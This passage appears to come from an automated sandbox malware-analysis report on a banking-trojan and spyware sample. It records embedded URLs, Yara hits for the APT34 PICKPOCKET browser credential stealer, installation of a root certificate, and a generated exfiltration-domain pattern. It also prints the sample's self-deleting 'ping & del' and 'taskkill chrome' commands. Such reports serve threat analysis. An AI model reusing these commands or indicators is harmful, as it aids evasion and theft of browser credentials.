Source: ecvFEAD.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpString found in binary or memory: https://charlesproxy.com/ssl1
Source: 56BB1610C0318054.exe, 00000004.00000003.376130421.0000000003D30000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 56BB1610C0318054.exe, 00000004.00000003.372926027.0000000003DBB000.00000004.00000001.sdmp, background.js.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 56BB1610C0318054.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 56BB1610C0318054.exe, 00000004.00000003.376130421.0000000003D30000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx-
Source: 56BB1610C0318054.exe, 00000004.00000003.373958396.0000000003D43000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxq
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.373472200.0000000003D67000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/c
Source: 56BB1610C0318054.exe, 00000004.00000003.373650211.0000000003D49000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.373930371.0000000003D44000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appQAB%HRQ
Source: 56BB1610C0318054.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsr
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: C:\Users\user\AppData\Roaming\1611970637183.exe Code function: 9_2_0040AE4D OpenClipboard,9_2_0040AE4D
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: Cyfj6XGbkd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,0_2_10019D40
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F00
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F50
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1611970637183.exe Code function: 9_2_0040C516 NtQuerySystemInformation,9_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611970637183.exe Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,9_2_0040C6FB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403660: DeviceIoControl,0_2_00403660
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: String function: 10010534 appears 35 times
Source: 1611970637183.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970637183.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cyfj6XGbkd.exe, 00000000.00000002.365545591.0000000000680000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365550326.0000000000690000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000000.342542352.0000000000412000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365576520.00000000007F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: Cyfj6XGbkd.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,9_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991058 CoCreateInstance,18_2_00991058
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040D9FC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Login Data1611970607033Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to behavior
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970637183.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Users\user\Desktop\Cyfj6XGbkd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'Jump to behavior
